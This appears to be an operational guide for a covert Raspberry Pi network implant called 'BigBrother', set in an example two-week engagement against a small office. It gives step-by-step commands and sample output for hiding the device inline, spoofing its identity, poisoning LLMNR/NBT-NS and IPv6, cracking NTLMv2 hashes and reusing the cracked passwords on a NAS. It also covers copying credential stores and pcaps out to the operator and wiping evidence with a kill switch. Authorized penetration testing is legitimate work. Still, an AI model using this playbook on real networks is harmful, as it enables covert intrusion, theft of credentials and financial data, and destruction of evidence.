Files
bigbrother/OPERATIONAL_WORKFLOW.md
T

19 KiB

BigBrother: Operational Workflow

Scenario: 2-week engagement on a small business network Target: 15 users, flat 10.0.1.0/24 network, no Active Directory, consumer router (Netgear Nighthawk), Synology NAS, 2 network printers (HP LaserJet), assorted IoT (Nest thermostat, Ring doorbell, Sonos speakers), mix of Windows 10/11 and macOS endpoints Hardware: Raspberry Pi 4 (4GB), 128GB industrial SD card, USB Ethernet adapter Deployment: Inline bridge behind front desk switch port


Pre-Deployment (Before You Arrive)

Hardware Prep (2-3 hours at your workstation)

1. Flash the SD card

Flash Raspberry Pi OS Lite (64-bit, Bookworm) to the 128GB card. Boot it once on your bench, connect via HDMI/keyboard, and run setup.

# On the Pi, first boot
sudo raspi-config  # enable SSH, set locale, disable desktop
cd /opt
sudo git clone <your-bigbrother-repo> .cache/bb
cd .cache/bb
sudo ./setup.sh --tier pi4

setup.sh takes 30-45 minutes. Installs all packages, venv, tool binaries, wordlists, LUKS, systemd services, kernel tuning. Everything pre-bundled so the Pi never fetches packages on target.

2. Configure the engagement

sudo bigbrother config --init
# storage/config/engagement.yaml
engagement:
  name: "op-acme-retail"
  client: "Acme Office Supply"

# storage/config/connectivity.yaml
tailscale:
  auth_key: "tskey-auth-kExAmPlE-0123456789abcdef"
  hostname: "iot-sensor-03"

3. Tailscale pre-auth key: Admin console, single-use, tagged tag:implant, 90-day expiry.

4. Set MAC and hostname:

sudo bigbrother config set device.hostname "iot-sensor-03"
sudo bigbrother config set stealth.mac_clone "Dell"    # Random Dell OUI, DHCP vendor class matches

5. Test kill switch: sudo bigbrother kill --dry-run -- verify on throwaway SD image.

6. Pack: Pi 4 (plain black case), USB-C 5V/3A PSU, USB Ethernet adapter, 2x 0.5m patch cables, scope doc (paper only).


Day 0: Drop

Physical Deployment (10-15 minutes on target)

On-site for a "network assessment kickoff meeting." Physical access available. Place inline between front desk wall jack and desktop -- cable run behind/under desk, no one inspects ethernet cables.

  1. Unplug ethernet from front desk PC's wall jack
  2. Wall jack cable into Pi's onboard eth0 (uplink)
  3. USB Ethernet adapter from Pi to front desk PC
  4. USB-C power in
  5. Wait 30 seconds for boot, tuck Pi behind monitor
  6. Verify front desk PC has connectivity (bridge is transparent)

Cable time: under 2 minutes. Remainder is positioning.

What Happens on Boot (~90 seconds)

  1. Bridge -- Transparent bridge eth0/eth1, cloned Dell MAC, STP/CDP/LLDP suppressed
  2. Core (disguised: "System Thermal Management Daemon") -- Engine up, LUKS mounted, state DB init
  3. Capture -- AF_PACKET promiscuous on bridge, packets flowing
  4. Passive -- All 22 modules start, subscribe to capture bus
  5. Tailscale -- Pre-auth key, joins tailnet as iot-sensor-03
  6. Watchdog -- Monitors and auto-restarts crashed modules
  7. Baseline -- traffic_mimicry begins 48-hour traffic profiling

First Check-In (15-30 min after drop)

From hotel/car: ssh operator@iot-sensor-03

sudo bigbrother selftest
[+] Platform: Pi 4 (4GB)  SD: 128GB (112GB free)  LUKS: mounted
[+] Bridge: eth0↔eth1 (transparent)  Capture: 247 pps
[+] Passive: 22/22 running  Active: 0/14 (PASSIVE_ONLY)
[+] Tailscale: UP (100.64.0.17)  Temp: 42C  RAM: 48%
[+] Kill switch: armed

All green. Disconnect, let it cook.


Day 1: First Check-In (24 Hours of Passive Collection)

ssh operator@iot-sensor-03
sudo bigbrother status
╭────────────────── BigBrother Status ─────────────────╮
│ op-acme-retail  Uptime: 23h 47m  Phase: PASSIVE_ONLY│
│ Pi 4 (4GB)  Temp: 44C  Disk: 109GB free             │
│ Tailscale: UP  Bridge: eth0↔eth1  Packets: 4.2M     │
│                                                      │
│ Passive (22/22 running):                             │
│  packet_capture   CPU 8%  62MB  PCAPs: 47            │
│  dns_logger       CPU 1%  14MB  Queries: 31K         │
│  tls_sni          CPU 1%  11MB  SNIs: 18K            │
│  cred_sniffer     CPU 2%  19MB  Creds: 3             │
│  kerberos_harvest CPU 0%  12MB  Tickets: 0           │
│  host_discovery   CPU 1%  14MB  Hosts: 23            │
│  traffic_analyzer CPU 3%  38MB  Flows: 8.2K          │
│  print_intercept  CPU 0%  12MB  Jobs: 7              │
│  ... (remaining nominal)                             │
│ Active: locked until Day 7                           │
│ Baseline: COLLECTING (24h / 48h)                     │
╰──────────────────────────────────────────────────────╯
sudo bigbrother triage
╭───────────────── Triage Report (24h) ────────────────╮
│ ── Hosts (23 discovered) ──                          │
│ 10.0.1.1   Netgear       router        (gateway)    │
│ 10.0.1.10  Dell          FRONT-DESK    Windows 11   │
│ 10.0.1.11  Apple         MacBook-Sarah macOS 14     │
│ 10.0.1.12  Dell          ACCT-PC-01    Windows 10   │
│ 10.0.1.13  Dell          ACCT-PC-02    Windows 10   │
│ 10.0.1.14  Apple         MacBook-Tom   macOS 14     │
│ 10.0.1.15  Dell          MANAGER-PC    Windows 11   │
│ 10.0.1.20  Synology      DiskStation   Linux        │
│ 10.0.1.30  HP            PRINTER-MAIN  JetDirect    │
│ 10.0.1.31  HP            PRINTER-BACK  JetDirect    │
│ 10.0.1.40  Nest Labs     thermostat                 │
│ 10.0.1.41  Ring          doorbell                   │
│ 10.0.1.42-43 Sonos       speakers (x2)              │
│ ... +9 phones/tablets/laptops                        │
│                                                      │
│ ── DNS (31,247 queries, 1,847 unique domains) ──     │
│ All via 10.0.1.1 → 8.8.8.8 (no internal DNS)       │
│ Top: ocsp.digicert.com, login.microsoftonline.com,   │
│   outlook.office365.com, quickbooks.intuit.com,      │
│   diskstation.local (mDNS), ring-api.com             │
│ ⚠ DoH: 3 hosts using 8.8.8.8:443 (partial blind)   │
│                                                      │
│ ── Credentials (3) ──                                │
│ SNMP "public" → 10.0.1.30, 10.0.1.31 (printers)    │
│ HTTP Basic admin:admin123 → 10.0.1.1:80 (router)    │
│                                                      │
│ ── Kerberos: None (no AD) ──                         │
│ ── Print Jobs: 7 (ACCT-PC, MANAGER-PC, FRONT-DESK) ─│
│ ── Topology: flat L2, no VLANs, no 802.1X/NAC ──    │
│ ── Security: No EDR/SIEM/IDS — Defender only ──      │
│ ── Anomalies: None ──                                │
╰──────────────────────────────────────────────────────╯

Assessment

Zero security infrastructure. No EDR, SIEM, IDS, NAC, or AD. Router admin creds captured passively in cleartext. Synology NAS is the central file server (8 hosts connect over SMB). M365 for email (cloud, nothing to sniff on-prem). Kerberos harvester will produce zero all engagement (no AD). Three DoH hosts create partial DNS blind spot.

Operator decisions: Keep passive, baseline not finished. Note router creds and NAS as high-value target. Review print jobs on Day 3.


Day 3: Deep Review

DNS Analysis (72 hours)

sudo bigbrother intel dns --top 50 --by-host

Patterns: Standard SaaS stack (M365, QuickBooks, Dropbox, Slack). NAS resolved via mDNS. IoT devices beacon constantly (Ring: 200+ queries/day to AWS). Personal browsing mixed in. No security tool updates, no VPN client traffic. No internal DNS server -- everything forwards through router to 8.8.8.8.

Credential Review

Still 3 credentials (passive only). On a modern encrypted network with no AD, passive credential capture is metadata-level. The cleartext sniffer only catches protocols that still use plaintext: router HTTP admin, printer SNMP.

Network Topology

sudo bigbrother topology --render
               [Internet]
                   |
           [10.0.1.1 Router]
                   |
     ┌─────────────┼──────────────┐
     |             |              |
 [Workstations] [10.0.1.20 NAS] [IoT 40-43]
  10.0.1.10-15  (SMB + HTTPS)
     |
 [Printers 30-31]

Flat L2, no segmentation. NAS serves 8 hosts over SMB. Printers accept unencrypted JetDirect from 6 hosts.

Security Posture

Windows Defender (built-in, unmanaged) on 6 hosts. No EDR, no SIEM, no IDS, no NAC, no management agents. Local accounts everywhere. Detection risk for active modules: LOW.

Print Jobs

sudo bigbrother intel prints --list

11 jobs captured over 3 days. ACCT-PC-01 and MANAGER-PC print to PRINTER-MAIN (port 9100, unencrypted). Ghostscript converts captured PCL/PostScript to PDF:

sudo bigbrother intel prints --view 3
# QuickBooks invoice — customer names, amounts, account numbers

JetDirect is always unencrypted. Print interception on small business networks is consistently high-value.

Traffic Analysis

sudo bigbrother intel traffic --beacons

No suspicious beacons. Known periodic traffic: Windows Update (4h), Ring (30s to AWS), Nest (60s), Sonos (5m), Slack WebSocket (30s). Clean network, no prior compromise.

Operator Decision

After 3 days: 23 hosts inventoried, router admin creds, full DNS history, 11 print jobs with financial data, zero security monitoring, baseline complete.

Decision: Go active on Day 5. Network has zero detection capability. Start with Responder -- highest-yield, lowest-noise active technique for NTLMv2 capture on Windows networks.


Day 5: Going Active

Why Responder First

Windows machines use LLMNR/NBT-NS for name resolution fallback even without AD. Mistyped hostnames, stale mapped drives, and WPAD lookups all broadcast queries. Responder answers them and captures NTLMv2 challenge-response hashes. Lower risk than ARP spoofing (no cache changes), produces crackable hashes without MITM position.

Activate Responder

sudo bigbrother activate responder_mgr
[*] Phase: ACTIVE_ALLOWED (Day 5)  Posture: No IDS/EDR — LOW risk
[*] IDS self-test: No Responder signatures matched
[+] Responder active (LLMNR + NBT-NS + mDNS poisoning)

Credential Flow

sudo bigbrother creds --since "2h ago"
╭──────────── New Credentials (last 2h) ───────────────╮
│ ID  Type     Username      Hash (truncated)   Source  │
│ 4   NTLMv2   sarah.m      SARAH.M::ACME:...  LLMNR  │
│ 5   NTLMv2   tsmith       TSMITH::FRONT-D:... NBT-NS│
│ 6   NTLMv2   admin.local  ADMIN.LOCAL::MAN... LLMNR  │
╰──────────────────────────────────────────────────────╯

Three NTLMv2 hashes in 2 hours. Typical for a small network. These are machine-local account hashes (no AD -- users authenticate with local accounts to the NAS and each other's shares).

Crack the Hashes

Pi 4 CPU is too slow for serious cracking. Push to your workstation:

sudo bigbrother creds --export hashcat --type ntlmv2 > /tmp/ntlmv2.txt
scp /tmp/ntlmv2.txt operator@your-workstation:/tmp/
# On workstation: hashcat -m 5600 /tmp/ntlmv2.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Expect 50-70% crack rate on a small business. Simple passwords, predictable patterns.

Detection Check + IPv6 SLAAC

sudo bigbrother intel posture --changes   # No changes, no one watching
sudo bigbrother activate ipv6_slaac       # Become IPv6 gateway, WPAD abuse

IPv6 SLAAC makes the Pi the IPv6 default gateway. Windows hosts route IPv6 DNS through the implant, catching additional NTLM auth via WPAD. No RA Guard on consumer networks.


Day 7-10: Active Collection Running

Credential Growth

sudo bigbrother creds --stats
╭──────────── Credential Stats (Day 7) ───────────────╮
│ Total: 18   Unique users: 9                          │
│ NTLMv2: 12  (8 cracked / 4 uncracked — 67%)         │
│ HTTP Basic: 1  |  SNMP: 2  |  HTTP POST: 3          │
│                                                      │
│ Source: Responder LLMNR 7, NBT-NS 3, SLAAC/WPAD 2,  │
│   Passive 6 (SNMP, HTTP Basic, Synology DSM)         │
│                                                      │
│ Cracked:                                             │
│   sarah.m:Flowers2024!   tsmith:Welcome1             │
│   admin.local:Acme2023!  jrodriguez:Summer2024       │
│   kpatel:Password1!      bwilson:Bwilson123          │
│   lchen:Dragon2024       mthompson:Qwerty123!        │
╰──────────────────────────────────────────────────────╯

IPv6 SLAAC + DNS poisoning redirected Synology DSM logins over HTTP -- 3 NAS passwords captured in cleartext, several reused from NTLMv2 hashes.

Manual Recon from Jump Box

SSH in and use pre-installed tools directly.

# NAS access with cracked admin.local password
smbmap -H 10.0.1.20 -u admin.local -p 'Acme2023!'
[+] IP: 10.0.1.20  Name: DiskStation
    homes        READ,WRITE    accounting   READ,WRITE
    shared       READ,WRITE    backups      READ ONLY
smbclient //10.0.1.20/accounting -U admin.local%'Acme2023!'
smb: \> ls
  2024_returns/     2025_returns/     payroll/
  invoices/         bank_statements/  passwords.xlsx    # Classic.
# Router — full admin access with Day 1 creds
curl -s -u admin:admin123 http://10.0.1.1/api/get_info | python3 -m json.tool
# Returns: firmware, WAN IP, DHCP leases, port forwards, WiFi PSK

# Password reuse testing
netexec ssh 10.0.1.20 -u sarah.m -p 'Flowers2024!'
# [+] sarah.m:Flowers2024! — NTLMv2 password works on NAS SSH

Change Detection

sudo bigbrother intel changes --since "Day 0"
New hosts: +2 (phones, WiFi)  Lost: -1 (MacBook-Tom offline Day 6)
New services: None  Scan activity: None  Verdict: No IR activity

Day 14: Wrap-Up

Final Credentials

sudo bigbrother creds --stats --full
Total: 24  |  Unique users: 11/15 (73%)  |  Password reuse: 7
NTLMv2: 14 (10 cracked)  |  HTTP Basic: 1  |  SNMP: 2
HTTP POST: 4 (Synology DSM)  |  WiFi PSK: 1  |  SSH keys: 2

Admin access obtained: Router (full), NAS (all shares + SSH),
  6 workstations (local admin via password reuse)

Pull Data

sudo bigbrother intel report --format html --output /tmp/report/
scp -r operator@iot-sensor-03:/tmp/report/ ./acme-report/

# Raw artifacts
scp operator@iot-sensor-03:/opt/.cache/bb/storage/creds/credentials.db ./
scp operator@iot-sensor-03:/opt/.cache/bb/storage/pcaps/cred_ring_*.pcap.zst.enc ./
scp -r operator@iot-sensor-03:/opt/.cache/bb/storage/print_jobs/ ./
scp -r operator@iot-sensor-03:/opt/.cache/bb/storage/dns_logs/ ./
scp -r operator@iot-sensor-03:/opt/.cache/bb/storage/audit/ ./   # Legal protection

Retrieval

On-site: unplug power, reconnect front desk PC to wall jack, verify connectivity, take the Pi. Total: 2 minutes.

Kill Switch (if not retrieving)

sudo bigbrother kill   # Passphrase confirmation required
[*] Destroying LUKS header... (milliseconds — data unrecoverable)
[*] Shredding keys + credential DB...
[*] Zeroing data partition... Clearing RAM... Rebooting.

Example Report Outline

Executive Summary

Over 14 days of authorized network monitoring, 73% of user accounts were compromised and full admin access was obtained to the router and central file server -- without triggering any alerts.

Findings (12 total)

# Severity Finding Remediation
1 CRIT Router admin creds in cleartext HTTP (admin:admin123) HTTPS-only admin, change password
2 CRIT NAS full access via reused passwords (accounting, payroll, bank data) Unique passwords, NAS 2FA, least privilege
3 CRIT passwords.xlsx on shared drive (banking, vendor creds in plaintext) Password manager, delete file
4 HIGH No network segmentation (IoT, printers, NAS on same L2) VLANs: separate IoT from business
5 HIGH Unencrypted print traffic (financial docs with PII intercepted) IPP-over-TLS or replace printers
6 HIGH Weak passwords (67% cracked, Word####! patterns) 14+ char policy, password manager
7 HIGH No endpoint management (Defender only, no MDM/patching) M365 Business Premium + Intune
8 MED SNMP default public on both printers Change community string or disable
9 MED No network monitoring (implant ran 14 days undetected) Router logging + syslog collector
10 MED IoT on business network (known vulns, no endpoint protection) Separate VLAN/guest network
11 LOW WiFi PSK visible from router admin panel Fixed by #1
12 LOW DoH on 3 hosts bypasses DNS monitoring Note for future architecture

Summary: Critical 3, High 4, Medium 3, Low 2


What Produced Zero Results

Module Why Zero
kerberos_harvester No AD, no Kerberos
ldap_harvester No AD, no LDAP
rdp_monitor No RDP in use
email_sniffer M365 is all TLS
voip_capture No VoIP (cell phones)
vlan_discovery Flat network
db_interceptor No database servers
cloud_token_harvester All cloud traffic encrypted
smb_monitor (content) SMB3 encryption on Win 11
auth_flow_tracker No centralized auth without AD

On a small business without AD, roughly half the passive modules produce zero. High-value modules for this environment: dns_logger, host_discovery, credential_sniffer, print_interceptor, network_mapper, traffic_analyzer, security_posture. Active modules (responder_mgr, ipv6_slaac) produced the majority of credential captures.


Timing Summary

Phase Duration Key Actions
Pre-deployment 2-3 hours Flash, configure, test
Day 0 (Drop) 10-15 min on site Physical install, verify bridge, first check-in
Day 1 30 min remote Status check, triage review
Day 3 1-2 hours remote Deep analysis, decision to go active
Day 5 30 min remote Activate Responder + IPv6, monitor
Day 7-10 2-3 hours remote (spread across days) Crack hashes, manual recon, NAS access, lateral checks
Day 14 1 hour remote + 10 min on site Report gen, data pull, physical retrieval
Total operator time ~8-10 hours over 2 weeks The implant does the work; the operator makes decisions